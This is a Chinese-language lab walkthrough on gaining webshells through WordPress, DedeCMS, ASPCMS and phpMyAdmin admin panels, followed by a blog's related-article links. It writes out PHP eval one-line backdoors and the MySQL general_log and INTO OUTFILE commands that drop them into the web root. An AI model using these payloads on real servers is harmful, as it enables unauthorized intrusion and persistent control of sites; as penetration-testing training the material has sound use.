常见CMS漏洞(wordpress,DedeCms,ASPCMS,PHPMyAdmin)

练习一:wordpress漏洞测试

1.上传包含木马的主题

安装网站

登陆网站 上传主题处测试漏洞注入

在上传主题模板压缩包中写入一句话木马

网站上传含有木马的zip压缩包

上传成功

wordpress主题目录 wp-content/themes 访问上传木马测试

2.修改主题的配置文件为含有木马的文件

练习2:DedeCMS-V5.7.82-UTF8 漏洞测试

安装网站
登录后台管理网站
1.通过文件管理器上传webshell
2.修改模板文件拿webshell

浏览主页 内容为所写入的phpinfo

3.后台任意命令执行拿webshell

查看添加广告路径

找到路径

进行木马连接

4.通过后台sql命令执行拿webshell

查看文件属性 发现是刚才写入的文件

进行木马连接

练习3:ASPCMS漏洞测试

登录网站后台

再访问网站后台

抓包

抓包修改 写入一句话木马 放行 页面修改成功

配置文件中写入了一句话木马

木马连接

练习4:PHPMyAdmin漏洞测试

网站根目录下更新了目录

访问网站 数据库账户密码 登录

1.界面图形化getshell
2.通过日志文件getshell
show global variables like '%general%';

查看 状态 (同样也可以在这里进行命令也可以修改日志位置)

set global general_log='on';
set global general_log_file = 'D:/phpstudy_pro/WWW/111.php'

写入一句话木马

select '<?php eval($_POST[cmd]);?>';

查看写入位置有写入文件

木马连接

3.导入导出getshell

先判断mysql位置

猜测网站路径D:/phpstudy_pro/www

写入木马文件

select "<?php eval($_POST[a]);?>" into outfile 'D:/phpstudy_pro/WWW/aaa.php';

进行木马连接

相关推荐
饮长安千年月4 小时前
Linksys WRT54G路由器溢出漏洞分析–运行环境修复
网络·物联网·学习·安全·机器学习
网络安全queen6 小时前
html网络安全工具源码 网络安全前端
安全·web安全
温柔小胖7 小时前
sql注入之python脚本进行时间盲注和布尔盲注
数据库·sql·网络安全
网络安全-老纪7 小时前
网络安全之如何发现安全漏洞
网络·安全·web安全
网络安全筑盾者-燕子9 小时前
计算机网络-OSI七层参考模型与数据封装,网络安全零基础入门到精通实战教程!
网络·计算机网络·安全·web安全·网络安全·osi
hvinsion10 小时前
深入解析TLS协议:保障网络通信安全的关键技术
网络协议·安全·网络安全
圣享科技SMARTLIC10 小时前
企业软件合规性管理:构建高效、安全的软件资产生态
大数据·安全·浮动许可证监控·许可证管理·浮动许可证优化·软件资产管理·浮动许可证管理
Guheyunyi11 小时前
接入DeepSeek后,智慧园区安全调度系统的全面提升
人工智能·python·安全·信息可视化·数据分析·智慧城市
网安Ruler11 小时前
泷羽Sec-黑客基础之html(超文本标记语言)
前端·学习·网络安全·html
仇辉攻防13 小时前
【云安全】云原生-Docker(六)Docker API 未授权访问
web安全·网络安全·docker·云原生·容器·kubernetes·安全威胁分析